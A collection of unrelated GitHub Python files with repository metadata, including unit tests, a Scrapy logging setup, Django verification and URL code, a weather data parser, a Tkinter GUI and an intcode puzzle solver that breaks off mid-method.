+{"seq_id":"72261597661","text":"\"\"\"Test the :mod:`dgp.ga_optimizer.__init__` module.\"\"\"\nimport unittest\n\nfrom dgp import ga_optimizer\nfrom dgp.utils import read_proben1_partition\n\n\nclass TestGeneticAlgorithm(unittest.TestCase):\n \"\"\"Test the genetic_algorithm.\"\"\"\n\n def test_genetic_algorithm(self):\n \"\"\"Run the genetic algorithm a few times and check if it works.\"\"\"\n first_weights, best_weights = ga_optimizer.genetic_algorithm(\n self.dataset,\n 5,\n 10,\n (6, 6),\n (1, 3),\n 0.5,\n 0.2,\n 0.75,\n 0.3,\n 0.3,\n False,\n 123112432,\n )\n first_score = ga_optimizer.utils.test_individual(\n first_weights, self.dataset\n )\n best_score = ga_optimizer.utils.test_individual(\n best_weights, self.dataset\n )\n self.assertLess(best_score[0], first_score[0])\n self.assertGreater(best_score[2], first_score[2])\n\n def setUp(self):\n \"\"\"Setup the model to run the algorithm.\"\"\"\n self.dataset = read_proben1_partition(\"cancer1\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"lulivi/dgp-lib","sub_path":"tests/ga_optimizer/test__init__.py","file_name":"test__init__.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40447702588","text":"'''\n풀이 참조\n전형적인 DP, LIS 유형 문제(가장 긴 부분 수열을 구하는 문제)\n\n자신보다 왼쪽에 작은 수가 얼마나 많이 있는지를 확인하는 문제.\n이게 왜 dp일까, dp table에 자신 보다 왼쪽에 있는 수 중에 작은 부분 배열의 최대 길이를 넣는다.\ndp Table을 쓰기 때문에 왼쪽 부분의 부분 배열을 매번 찾는 반복문을 줄여준다.\n\ninput\n7\n15 11 4 8 5 2 4\n'''\n\nn = int(input())\ncnt = 0\n\nsoldiers = list(map(int, input().split()))\nsoldiers.reverse()\ndp = [1] * n #부분 수열의 명 수 표시 #해당 인덱스까지의 연속된 숫자\n\nfor i in range(1, n):\n for j in range(0, i):\n if soldiers[j] < soldiers[i]:\n dp[i] = max(dp[i], dp[j] + 1)\n\nprint(n - max(dp))","repo_name":"Mminy62/icote-python","sub_path":"16/chap16_4.py","file_name":"chap16_4.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24465586692","text":"# This package will contain the spiders of your Scrapy project\n#\n# Please refer to the documentation for information on how to create and manage\n# your spiders.\n\nimport sys, os, datetime, errno\nimport logging\nfrom scrapy.log import ScrapyFileLogObserver\n\ntry:\n import sys, os, datetime, errno\n today = datetime.datetime.utcnow().strftime(\"%Y%m%d\")\n logdir = None\n # ACCUM is the root directory\n try:\n accum = os.environ[\"ACCUM\"]\n except:\n accum = \"/lfs1/users/wat\"\n logdir = os.path.join(accum, \"log/escort/%s/www.eros.com/\" % today)\n # ensure log directory exists\n try:\n os.makedirs(logdir)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n logfile = open(os.path.join(logdir, \"scrapy.log\"), 'a')\n log_observer = ScrapyFileLogObserver(logfile, level=logging.DEBUG)\n log_observer.start()\n\nexcept Exception as e:\n print >> sys.stderr, \"Failed to create log dir %r [%r]\" % (logdir, e)\n\nimport sys\nprint >> sys.stderr, \"SETTINGS: log file %r\" % logfile\n","repo_name":"usc-isi-i2/dig-crawl","sub_path":"eroscrawl/eroscrawl/spiders/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30436792319","text":"import logging\nimport re\n\nfrom avocado.core.exceptions import TestFail\nfrom virttest import virsh\nfrom virttest.libvirt_xml.nodedev_xml import NodedevXML, MdevXML\nfrom provider.vfio import ccw\n\n\nLOG = logging.getLogger(\"avocado.\" + __name__)\n\n\ndef get_device_xml(schid):\n \"\"\"\n Returns the nodedev device xml path.\n\n :param schid: the subchannel id for the ccw device, e.g. 0.0.0062\n \"\"\"\n\n parent_name = \"css_\" + schid.replace(\".\", \"_\")\n device_xml = NodedevXML()\n device_xml['parent'] = parent_name\n mdev_xml = MdevXML()\n mdev_xml['type_id'] = 'vfio_ccw-io'\n mdev_xml['uuid'] = '8d312cf6-f92a-485c-8db8-ba9299848f46'\n device_xml.set_cap(mdev_xml)\n return device_xml.xml\n\n\ndef get_device_name():\n \"\"\"\n Returns first defined but not started\n mdev device name.\n \"\"\"\n\n try:\n result = virsh.nodedev_list(cap=\"mdev\", options=\"--all\", ignore_status=False, debug=True)\n return result.stdout.strip().splitlines()[0]\n except:\n raise TestFail(\"Mdev device not found.\")\n\n\ndef check_autostart(device_name):\n \"\"\"\n Check if device is configured to autostart\n\n :param device_name: nodedev device name\n :raises: TestFail if autostart is not configured\n \"\"\"\n result = virsh.nodedev_info(device_name, ignore_status=False, debug=True)\n if not re.findall(\"Autostart.*yes\", result.stdout_text):\n raise TestFail(\"Device %s not configured to autostart.\" % device_name)\n\n\ndef run(test, params, env):\n \"\"\"\n Round trip for persistent setup via nodedev API:\n define, set autostart, start, destroy, undefine\n\n The test assumes no other mediated device is available\n in the test environment.\n\n A typical node device xml would look like:\n \n css_0_0_0062 \n \n \n 8d312cf6-f92a-485c-8db8-ba9299848f46 \n \n \n \"\"\"\n\n schid = None\n\n try:\n schid, _ = ccw.get_device_info()\n ccw.set_override(schid)\n nodedev_file_path = get_device_xml(schid)\n virsh.nodedev_define(nodedev_file_path, ignore_status=False, debug=True)\n device_name = get_device_name()\n virsh.nodedev_autostart(device_name, ignore_status=False, debug=True)\n check_autostart(device_name)\n virsh.nodedev_start(device_name, ignore_status=False, debug=True)\n virsh.nodedev_destroy(device_name, ignore_status=False, debug=True)\n virsh.nodedev_undefine(device_name, ignore_status=False, debug=True)\n finally:\n if schid:\n ccw.unset_override(schid)\n","repo_name":"autotest/tp-libvirt","sub_path":"libvirt/tests/src/virsh_cmd/nodedev/virsh_nodedev_persistence_mdev.py","file_name":"virsh_nodedev_persistence_mdev.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"69"}
+{"seq_id":"41397363977","text":"from tkinter import *\n\nclass Gui(Tk):\n\n def __init__(self):\n super().__init__()\n \n # load resources\n self.first_cactus_image = PhotoImage(file=\"cacto.gif\")\n self.second_cactus_image = PhotoImage(file=\"cacti.gif\")\n \n # set window attributes\n self.title(\"Cactus Flipping\")\n \n # add components\n self.__add_heading_label()\n self.__add_cactus_image_label()\n self.__add_flip_button()\n\n def __add_heading_label(self):\n #create\n self.heading_label = Label()\n self.heading_label.grid(row=0, column=0, pady=20)\n #style\n self.heading_label.configure(text=\"Cactus\",\n font=\"Ariel 25\",\n fg=\"#008080\")\n\n def __add_cactus_image_label(self):\n #create\n self.cactus_image_label = Label()\n self.cactus_image_label.grid(row=1, column=0)\n #style\n self.cactus_image_label.configure(image=self.first_cactus_image,\n height=500,\n width=500)\n\n def __add_flip_button(self):\n #create\n self.flip_button = Button()\n self.flip_button.grid(row=2, column=0, ipadx=100, pady=20)\n #style\n self.flip_button.configure(text=\"Flip\",\n font=\"Ariel 16\",\n fg=\"#ffffff\",\n bg=\"#008080\")\n #events\n self.flip_button.bind(\"\", self.__left_mouse_clicked)\n self.flip_button.bind(\"\", self.__right_mouse_clicked)\n \n\n def __left_mouse_clicked(self, event):\n #display\n self.cactus_image_label.configure(image = self.second_cactus_image)\n self.heading_label.configure(text=\"\")\n \n\n def __right_mouse_clicked(self, event):\n #display\n self.cactus_image_label.configure(image = self.first_cactus_image)\n self.heading_label.configure(text=\"Cactus\")\n \n\n# Create an object of the Gui class when this module is executed\nif (__name__ == \"__main__\"):\n gui = Gui()\n gui.mainloop()\n","repo_name":"ashishrain/com404","sub_path":"2-guis/4-images/2-swapping/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72714711261","text":"import re\nimport threading\nfrom distutils.command.config import config\n\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import render_to_string\nfrom rest_framework.exceptions import ValidationError\nfrom twilio.rest import Client\n\nemail_regex = re.compile(r\"\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Z|a-z]{2,7}\\b\")\nphone_regex = re.compile(r\"(\\+[0-9]+\\s*)?(\\([0-9]+\\))?[\\s0-9\\-]+[0-9]+\")\n\n\ndef check_email_or_phone(email_or_phone):\n if re.fullmatch(email_regex, email_or_phone):\n email_or_phone = \"email\"\n\n elif re.fullmatch(phone_regex, email_or_phone):\n email_or_phone = \"phone\"\n\n else:\n data = {\n 'success': False,\n 'message': \"Email yoki telefon raqamingiz noto'g'ri\"\n }\n raise ValidationError(data)\n return email_or_phone\n\n\nclass EmailThread(threading.Thread):\n\n def __init__(self, email):\n self.email = email\n threading.Thread.__init__(self)\n\n def run(self):\n self.email.send()\n\n\nclass Email:\n @staticmethod\n def send_email(data):\n email = EmailMessage(\n subject=data['subject'],\n body=data['body'],\n to=[data['to_email']]\n )\n if data.get('content_type') == \"html\":\n email.content_subtype = 'html'\n EmailThread(email).start()\n\n\ndef send_email(email, code):\n html_content = render_to_string(\n 'email/authentication/activate_account.html',\n {\"code\": code}\n )\n Email.send_email(\n {\n \"subject\": \"Royhatdan otish\",\n \"to_email\": email,\n \"body\": html_content,\n \"content_type\": \"html\"\n }\n )\n\n\ndef send_phone_code(phone, code):\n accound_sid = config(\"accound_sid\")\n auth_token = config(\"auth_token\")\n client = Client(accound_sid, auth_token)\n client.messages.create(\n body=f\"Salom do'stim! sizning tasdiqlash kodingiz: {code}\\n\",\n from_=\"+998947267726\",\n to=f\"{phone}\"\n )\n","repo_name":"nizomiddin-rakhimberdiev/instagram-clone","sub_path":"shared/utilits.py","file_name":"utilits.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74180455580","text":"# -*- coding: utf-8 -*-\n\nimport threading\nimport json\nfrom PySide6.QtCore import QObject, Signal\n\nfrom action import Action\nfrom converter import Converter\nfrom column import ColumnStatus\n\nclass ConvertThread(QObject):\n thread_signal = Signal(str)\n\n def __init__(self, parent):\n super().__init__(parent)\n self.threads = []\n\n @staticmethod\n def gen_msg(file_id, status, msg):\n content = {'file_id': file_id, 'status': status, 'msg': msg}\n return json.dumps(content)\n\n def start(self, file_id):\n self.thread_signal.emit(self.gen_msg(file_id, ColumnStatus.Start.value, ''))\n\n def convert(self, file_id, src_file, dst_file, action):\n try:\n print('convert: ', src_file, '|', dst_file, '|', action)\n\n self.thread_signal.emit(self.gen_msg(file_id, ColumnStatus.Running.value, ''))\n\n Converter.convert(src_file, dst_file, action)\n\n self.thread_signal.emit(self.gen_msg(file_id, ColumnStatus.End.value, ''))\n except Exception as e:\n self.thread_signal.emit(self.gen_msg(file_id, ColumnStatus.Exception.value, str(e)))\n print(e)\n\n def add(self, file_id, src_file, dst_file, action):\n thread = None\n # noinspection PyBroadException\n try:\n thread = threading.Thread(target=self.convert, args=(file_id, src_file, dst_file, action))\n thread.start()\n except:\n thread = None\n print('thread exception')\n\n if thread:\n self.threads.append(thread)\n print('add: ', file_id, src_file, dst_file, action)\n\n def wait(self):\n # noinspection PyBroadException\n try:\n for thread in self.threads:\n thread.join()\n except:\n print('join exception')\n\n self.threads = []\n self.thread_signal.emit(self.gen_msg(-1, ColumnStatus.Done.value, ''))","repo_name":"iounce/PySidePDF","sub_path":"thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"35418774545","text":"import json\nimport os\nfrom elad_testing.src.utilities.wooAPIUtility import WooAPIUtility\n\nclass OrdersHelper(object):\n\n def __init__(self):\n self.cur_file_dir = os.path.dirname(os.path.realpath(__file__))\n self.woo_helper = WooAPIUtility()\n\n def create_order(self, additional_args=None):\n\n payload_temaplte = os.path.join(self.cur_file_dir,'..','data','create_order_payload.json')\n\n with open(payload_temaplte) as f:\n payload = json.load(f)\n\n # if the user adds more info to payload, then update it\n if additional_args:\n # assert if the additional_args is a dictionary\n assert isinstance(additional_args,dict), f\"Parameter additional_args must be a dictionary but found {type(additional_args)}\"\n payload.update(additional_args)\n\n\n rs_api = self.woo_helper.post('orders', params=payload, expected_status_code=201)\n\n return rs_api","repo_name":"eladSalti/backhand-rest-api-pytest","sub_path":"elad_testing/src/helpers/orders_helper.py","file_name":"orders_helper.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"2747250367","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 2 18:34:18 2020\n\n@author: yiye\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport os\nimport csv\nimport pickle\n\n# Pre-detrend control\nisdetrend = False\n\nstation_coordinate = pd.DataFrame(np.zeros(shape = (1218, 3)), columns=['ID', 'lat', 'long'])\nwith open('Weather data/stations.txt', 'r') as fd:\n reader = csv.reader(fd)\n for s, row in enumerate(reader):\n station_coordinate.iloc[s,0] = row[0][:11]\n station_coordinate.iloc[s,1] = float(row[0][12:20])\n station_coordinate.iloc[s,2] = float(row[0][21:30])\nstation_coordinate.sort_values(by='ID', inplace = True)\n\neff_yr = []\nwith open('Weather data/tmin/' + 'USH00011084.FLs.52j.tmin', 'r') as fd:\n reader = csv.reader(fd)\n for y, row in enumerate(reader):\n if y in range(3): continue\n eff_yr.append(row[0][12:16])\nT = 127*12-1\n\nstation_list_tmin = os.listdir('Weather data/tmin/')\nstation_list_tmin.remove('.DS_Store')\nstation_list_tmin.sort()\ntmin = np.zeros(shape = (1218, T)) \nfor i, station in enumerate(station_list_tmin):\n #if station[5:7] != '04': continue # take the stations of california\n with open('Weather data/tmin/' + station, 'r') as fd:\n reader = csv.reader(fd)\n table = np.zeros(shape = (127, 12))\n y = 0\n for row in reader:\n if row[0][12:16] not in eff_yr: continue\n if row[0][12:16] != eff_yr[y]: \n table[:,:] = np.nan\n break\n for m in range(12):\n table[y, m] = int(row[0][(17+9*m-1):(17+9*m+5)])/100\n y += 1\n a = table.copy()\n table[table == -99.99] = np.nan\n if isdetrend: table -= np.nanmean(table,axis = 0) # detrend using monthly trends \n tmin[i,:] = table.flatten()[:-1]\nstd_tmin = np.nanstd(tmin, axis = 1)\n\n\nstation_list_tmax = os.listdir('Weather data/tmax/')\nstation_list_tmax.sort()\ntmax = np.zeros(shape = (1218, T)) \nfor i, station in enumerate(station_list_tmax):\n #if station[5:7] != '04': continue # take the stations of california\n with open('Weather data/tmax/' + station, 'r') as fd:\n reader = csv.reader(fd)\n table = np.zeros(shape = (127, 12))\n y = 0\n for row in reader:\n if row[0][12:16] not in eff_yr: continue\n if row[0][12:16] != eff_yr[y]: \n table[:,:] = np.nan\n break\n for m in range(12):\n table[y, m] = int(row[0][(17+9*m-1):(17+9*m+5)])/100\n y += 1\n table[table == -99.99] = np.nan\n if isdetrend: table -= np.nanmean(table,axis = 0) \n tmax[i,:] = table.flatten()[:-1]\nstd_tmax = np.nanstd(tmax, axis = 1)\n\n \nstation_list_tavg = os.listdir('Weather data/tavg/')\nstation_list_tavg.sort()\ntavg = np.zeros(shape = (1218, T)) \nfor i, station in enumerate(station_list_tavg):\n #if station[5:7] != '04': continue # take the stations of california\n with open('Weather data/tavg/' + station, 'r') as fd:\n reader = csv.reader(fd)\n table = np.zeros(shape = (127, 12))\n y = 0\n for row in reader:\n if row[0][12:16] not in eff_yr: continue\n if row[0][12:16] != eff_yr[y]: \n table[:,:] = np.nan\n break\n for m in range(12):\n table[y, m] = int(row[0][(17+9*m-1):(17+9*m+5)])/100\n y += 1\n table[table == -99.99] = np.nan\n if isdetrend: table -= np.nanmean(table,axis = 0) \n tavg[i,:] = table.flatten()[:-1]\nstd_tavg = np.nanstd(tavg, axis = 1)\n\n\nstation_list_prcp = os.listdir('Weather data/prcp/')\nstation_list_prcp.sort()\nprcp = np.zeros(shape = (1218, T)) \nfor i, station in enumerate(station_list_prcp):\n #if station[5:7] != '04': continue # take the stations of california\n with open('Weather data/prcp/' + station, 'r') as fd:\n reader = 
csv.reader(fd)\n table = np.zeros(shape = (127, 12))\n y = 0\n for row in reader:\n if row[0][12:16] not in eff_yr: continue\n if row[0][12:16] != eff_yr[y]: \n table[:,:] = np.nan\n break\n for m in range(12):\n table[y, m] = int(row[0][(17+9*m-1):(17+9*m+5)])/100\n y += 1\n table[table == -99.99] = np.nan\n if isdetrend: table -= np.nanmean(table,axis = 0) \n prcp[i,:] = table.flatten()[:-1]\nstd_prcp = np.nanstd(prcp, axis = 1)\n\n\na = ~np.isnan(tmin).any(axis=1)\nb = ~np.isnan(tmax).any(axis=1)\nc = ~np.isnan(tavg).any(axis=1)\nd = ~np.isnan(prcp).any(axis=1)\n\neff_station = a*b*c*d\n\n# Take California No.04 and Nevada No.26\nind04 = [i for i, x in enumerate(station_list_tmin) if eff_station[i] and x[5:7] == '04']\nind26 = [i for i, x in enumerate(station_list_tmin) if eff_station[i] and x[5:7] == '26']\nstation_name = [x for i, x in enumerate(station_list_tmin) if i in (ind04 + ind26)]\n \nind = ind04 + ind26\n\ndt_MTS = np.zeros(shape = (len(ind), 4, T)) \nfor t in range(T):\n dt_MTS[:, 0, t] = tmin[ind, t]\n dt_MTS[:, 1, t] = tmax[ind, t]\n dt_MTS[:, 2, t] = tavg[ind, t]\n dt_MTS[:, 3, t] = prcp[ind, t]\n\nwith open('dt_MTS_04_26','wb') as fp:\n pickle.dump((dt_MTS, ind),fp)\n \n \n#dt_MTS = np.zeros(shape = (len(ind), 4, T)) \n#for t in range(T):\n# dt_MTS[:, 0, t] = tmin[ind, t]/std_tmin[ind]\n# dt_MTS[:, 1, t] = tmax[ind, t]/std_tmax[ind]\n# dt_MTS[:, 2, t] = tavg[ind, t]/std_tavg[ind]\n# dt_MTS[:, 3, t] = prcp[ind, t]/std_prcp[ind]\n ","repo_name":"yiyej/Online_GL_matrix-valued_time_series","sub_path":"weather_data.py","file_name":"weather_data.py","file_ext":"py","file_size_in_byte":5545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17533822656","text":"from __future__ import print_function\n\nimport json\nimport os\nimport sys\nimport time\nimport unittest\n\nfrom config import ConfigOpts\nfrom pywbem import *\n\n\nclass BaseTestCase(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Run before each test method to initialize test environment.\"\"\"\n super(BaseTestCase, self).setUp()\n \n print(\"======================================================================\")\n print(\"[Test Case] %s\" % self._testMethodName)\n \n self.start = time.time()\n \n self.config = ConfigOpts()\n self.config.setup()\n \n self.conn = WBEMConnection(self.config.url, creds=(self.config.userid, self.config.password), default_namespace=self.config.namespace)\n\n def tearDown(self):\n super(BaseTestCase, self).tearDown()\n \n end = time.time()\n msg = ('[Test Case] end, taking %s seconds.' % (\"%.1f\" % (end - self.start)))\n print(msg)\n \n def dump(self, obj):\n for attr in dir(obj):\n print ('obj.%s = %s' % (attr, getattr(obj, attr)))\n \ndef main():\n unittest.main()\n","repo_name":"zhaoeryi/ironic-testing","sub_path":"ironic-testing/tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20800313740","text":"import pylab as plt\nfrom audiolazy import wsymm # Try using \"window\" instead of wsymm\n\nsize = 256\n\nfor func in wsymm:\n plt.plot(func(size), label=func.__name__)\n\nplt.legend(loc=\"best\")\nplt.axis(xmin=-5, xmax=size + 5 - 1, ymin=-.05, ymax=1.05)\nplt.title(\"AudioLazy windows for size of {} samples\".format(size))\nplt.tight_layout()\nplt.ioff()\nplt.show()\n","repo_name":"danilobellini/audiolazy","sub_path":"examples/windows_plot.py","file_name":"windows_plot.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":671,"dataset":"github-code","pt":"69"}
+{"seq_id":"33023977709","text":"#! python 3\n# phoneAndEmail.py - Finds phone numbers and email addresses on the clipboard\n\nimport pyperclip\nimport re\n\n\n# Regex for phone numbers (American)\n\nphoneRegex = re.compile(r'''(\n (\\d{3}|\\(\\d{3}\\))? # area code\n (\\s|-|\\.)? # separator\n (\\d{3}) # first 3 digits\n (\\s|-|\\.) # separator\n (\\d{4}) # last 4 digits\n (\\s*(ext|x|ext.)\\s*(\\d{2,5}))? # extension\n)''', re.VERBOSE)\n\n\n# Regex for email address\n\nemailRegex = re.compile(r'''\n [a-zA-Z0-9._%+-]+ # username\n @ # @ symbol\n [a-zA-Z0-9.-]+ # domain name\n \\.[a-zA-Z]{2,4} # dot-something\n ''', re.VERBOSE)\n\n# find matches in clipboard text (from website or any page that may contain #'s and emails)\ntext = str(pyperclip.paste())\nmatches = []\nfor groups in phoneRegex.findall(text):\n phoneNum = '-'.join([groups[1], groups[3], groups[5]])\n if groups[8] != '':\n phoneNum += 'x' + groups[8]\n matches.append(phoneNum)\n\nfor groups in emailRegex.findall(text):\n matches.append(groups)\n\n\n# Copy results to clipboard\n\nif len(matches) > 0:\n pyperclip.copy('\\n'.join(matches))\n print('Copied to clipboard:')\n print('\\n'.join(matches))\nelse:\n print(\"No email address or phone number matches found!\")\n","repo_name":"cabmeron/Automate-Boring-Stuff-With-Python","sub_path":"Pattern-Matching-With-Regular-Expressions/phoneAndEmail_string_extractor/phoneAndEmail.py","file_name":"phoneAndEmail.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30300699720","text":"from django.urls import path\nfrom AppTecno import views\n\nfrom django.contrib.auth.views import LogoutView\n\nurlpatterns = [\n#inicio de la app\npath('tecnologia', views.tecnologia, name=\"Tecnologia\"),\n\n#Urls laptops\npath('laptopRegistro',views.laptopRegistro, name=\"LaptopRegistro\"),\npath('leerLaptops',views.leerLaptops,name=\"LeerLaptops\"),\npath('eliminarLaptop//',views.eliminaLaptop,name=\"EliminarLaptop\"),\npath('modificarLaptop//',views.modificarLaptop,name=\"ModificarLaptop\"),\npath('buscarLaptop/', views.buscarLaptop),\n#Urls Views laptop\npath('laptops',views.Laptoplist.as_view(),name='Laptops'),\npath(r'^nuevo$', views.LaptopCreacion.as_view(), name='New'),\npath(r'^editar/(?P\\d+)$', views.LaptopModificar.as_view(), name='Edit'),\npath(r'^borrar/(?P\\d+)$', views.LaptopEliminar.as_view(), name='Delete'),\n\n#Urls Celulares\npath('celularesRegistro',views.celularesRegistro, name=\"CelularesRegistro\"),\npath('leerCelulares',views.leerCelulares,name=\"LeerCelulares\"),\npath(r'^editarCel/(?P\\d+)$', views.CelularModificar.as_view(), name='EditCel'),\npath('eliminarCelular//',views.eliminaCelular,name=\"EliminarCelular\"),\npath('buscarCelular/', views.buscarCelular),\n\n#Urls Televisores\npath('televisoresRegistro',views.televisoresRegistro, name=\"TelevisoresRegistro\"),\npath('leerTelevisores',views.leerTelevisores,name=\"LeerTelevisores\"),\npath(r'^editarTel/(?P\\d+)$', views.TelevisorModificar.as_view(), name='EditTel'),\npath('eliminarTelevisor//',views.eliminaTelevisor,name=\"EliminarTelevisor\"),\npath('buscarTelevisor/', views.buscarTelevisor),\n]\n","repo_name":"Alexander9122/ProyectoFinalCoder","sub_path":"WebVentas/AppTecno/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"36048589623","text":"\"\"\"\n07\n\"\"\"\nimport itertools\n\nfrom egc.computer import ElfGuidanceComputer\nfrom utils.solver import ProblemSolver\n\n\nclass Day07ElfGuidanceComputer(ElfGuidanceComputer):\n def __init__(self, ampID, *args, **kwargs):\n super(Day07ElfGuidanceComputer, self).__init__(*args, **kwargs)\n self.ampID = ampID\n self.inputCounter = -1\n self.phase = -1\n self.input = 0\n self.output = 0\n\n def _store(self):\n \"\"\"\n Stores the result of the computer's GetInput function and stores its value at the position specified\n\n :returns int: The number of parameters used in the instruction\n \"\"\"\n value = self.GetInput()\n if value is not False:\n self._setValueForParameter(0, value)\n\n return 2\n\n return 0\n\n def GetInput(self):\n \"\"\"\n Get the current phase setting, a value between 0 and 4\n\n :return: The phase setting of this computer, if valid\n \"\"\"\n self.inputCounter += 1\n\n # if it's the first input call, grab the phase setting\n if self.inputCounter == 0:\n return self.phase\n else:\n return self.input\n\n\nclass Day07ConcurrentComputer(Day07ElfGuidanceComputer):\n def __init__(self, *args, **kwargs):\n super(Day07ConcurrentComputer, self).__init__(*args, **kwargs)\n self.paused = False\n self.next = -1\n self.input = False\n self.paused = False\n\n @property\n def input(self):\n return self._input\n\n @input.setter\n def input(self, value):\n self._input = value\n self.paused = False\n\n def step(self):\n super(Day07ConcurrentComputer, self).step()\n #print(self.ampID, self.currentIndex, self.buffer)\n\n def GetInput(self):\n self.inputCounter += 1\n # if we don't have an input signal, pause\n if self.input is False:\n self.paused = True\n return False\n\n if self.inputCounter > 0:\n output = self.input\n self.input = False\n return output\n else:\n return self.phase\n\n def Output(self, value):\n \"\"\"\n On output, pause execution until we recieve a new input signal\n\n :param value:\n \"\"\"\n super(Day07ConcurrentComputer, self).Output(value)\n\n def RunUntilOutput(self):\n while not self.paused and not self.finished:\n self.step()\n\n\nclass DaySolver07(ProblemSolver):\n def __init__(self):\n super(DaySolver07, self).__init__(7)\n\n self.testDataPartOne = {('3,15,3,16,1002,16,10,16,1,16,15,15,4,15,99,0,0', '43210'): 43210,\n ('3,23,3,24,1002,24,10,24,1002,23,-1,23,101,5,23,23,1,24,23,23,4,23,99,0,0', '01234'): 54321,\n ('3,31,3,32,1002,32,10,32,1001,31,-2,31,1007,31,0,33,1002,33,7,33,1,33,31,31,1,32,31,31,4,31,99,0,0,0','10432'): 65210}\n self.testDataPartTwo = {('3,26,1001,26,-4,26,3,27,1002,27,2,27,1,27,26,27,4,27,1001,28,-1,28,1005,28,6,99,0,0,5', '98765'): 139629729,\n ('3,52,1001,52,-5,52,3,53,1,52,56,54,1007,54,5,55,1005,55,26,1001,54,-5,54,1105,1,12,1,53,54,53,1008,54,0,55,1001,55,1,55,2,53,55,53,4,53,1001,56,-1,56,1005,56,6,99,0,0,0,0,10', '97856'): 18216\n }\n\n self.amplifierIDs = ['a', 'b', 'c', 'd', 'e']\n self.nextAmplifier = {'a':'b',\n 'b':'c',\n 'c':'d',\n 'd':'e',\n 'e':'a'}\n self.phases = [0, 1, 2, 3, 4]\n\n def ProcessInput(self, data=None):\n \"\"\"\n :param str data: comma-separated integers\n\n :returns list[int]: the intcode buffer\n \"\"\"\n if not data:\n data = self.rawData\n\n processed = [int(i) for i in data.split(',')]\n\n return processed\n\n def _initializeAmplifiers(self, data, amplifierClass=Day07ElfGuidanceComputer):\n \"\"\"\n\n :return dict: the initialized amplifier computers mapped to str ids\n \"\"\"\n return {amp: amplifierClass(amp, data.copy()) for amp in self.amplifierIDs}\n\n def 
TestAlgorithm(self, algorithm, part=1):\n \"\"\"\n Override the algorithm testing method so we can customize\n how we handle input data for testing part 1\n\n :param func algorithm: the algorithm to test\n :param int part: the part of the day we 're testing\n\n :return bool: if we succeeded\n \"\"\"\n if part == 2:\n for test, expectedResult in self.testDataPartTwo.items():\n data, phaseOrder = test\n\n processed = self.ProcessInput(data=data)\n phaseOrder = [int(i) for i in phaseOrder]\n\n amplifiers = self._initializeAmplifiers(processed, amplifierClass=Day07ConcurrentComputer)\n\n result = self.testPhaseOrderConcurrent(amplifiers, phaseOrder)\n\n if result != expectedResult:\n raise Exception(\"Test on Part2 data {} returned result {}\".format(test, result))\n\n else:\n for test, expectedResult in self.testDataPartOne.items():\n data, phaseOrder = test\n\n processed = self.ProcessInput(data=data)\n phaseOrder = [int(i) for i in phaseOrder]\n\n amplifiers = self._initializeAmplifiers(processed)\n\n result = self.testPhaseOrder(amplifiers, phaseOrder)\n\n if result != expectedResult:\n raise Exception(\"Test on data {} returned result {}\".format(test, result))\n\n return True\n\n def testPhaseOrder(self, amplifiers, phaseOrder):\n \"\"\"\n Test the given amplifier buffer based on the input phaseOrder values\n\n :param dict amplifiers:\n :param list phaseOrder:\n\n :return int: the output buffer of amplifier e\n \"\"\"\n amplifiers = amplifiers.copy()\n\n for i, value in enumerate(self.amplifierIDs):\n amplifiers[value].phase = phaseOrder[i]\n\n amplifiers['a'].input = 0\n\n for i, value in enumerate(self.amplifierIDs):\n amplifiers[value].Run()\n\n if i + 1 < len(self.amplifierIDs):\n amplifiers[self.amplifierIDs[i + 1]].input = amplifiers[value].output\n\n return amplifiers['e'].output\n\n def testPhaseOrderConcurrent(self, amplifiers, phaseOrder):\n amplifiers = amplifiers.copy()\n\n # tell the amplifiers who to talk to next\n for amp in amplifiers:\n amplifiers[amp].next = self.nextAmplifier[amp]\n\n # populate the input buffer with the phase of the amplifier to start\n for i, value in enumerate(self.amplifierIDs):\n amplifiers[value].phase = phaseOrder[i]\n\n # pre-populate the second input of the 'a' amplifier\n amplifiers['a'].input = 0\n\n allFinished = False\n\n while not allFinished:\n for ampID, amplifier in amplifiers.items():\n #print(ampID)\n if not amplifier.finished:\n amplifier.RunUntilOutput()\n\n amplifiers[amplifier.next].input = amplifier.output\n\n allFinished = all([amplifier.finished for amplifier in amplifiers.values()])\n\n return amplifiers['e'].output\n\n def SolvePartOne(self, data=None):\n 